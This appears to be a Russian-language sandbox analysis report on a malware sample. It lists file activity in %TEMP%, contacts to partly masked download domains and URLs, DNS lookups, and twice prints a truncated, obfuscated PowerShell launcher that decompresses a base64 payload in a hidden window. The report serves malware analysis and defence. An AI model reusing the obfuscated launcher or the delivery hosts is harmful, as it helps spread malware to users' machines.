Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\488.exe
Удаляет следующие файлы
- %TEMP%\488.exe
Подменяет следующие файлы
- %TEMP%\488.exe
Сетевая активность
Подключается к
- 'hz##djd.com':80
- 'li####na.barcelona':80
- 'li####na.barcelona':443
- 'me######geriatrica.com.br':80
- 'me######geriatrica.com.br':443
TCP
Запросы HTTP GET
- http://www.hz##djd.com/4wgp/
- http://li####na.barcelona/kYZyu/
- http://www.me######geriatrica.com.br/9V8/
Другие
- 'li####na.barcelona':443
- 'me######geriatrica.com.br':443
UDP
- DNS ASK hz##djd.com
- DNS ASK em###arton.com
- DNS ASK li####na.barcelona
- DNS ASK me######geriatrica.com.br
- DNS ASK ri#####amindonesia.com
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK... (со скрытым окном)
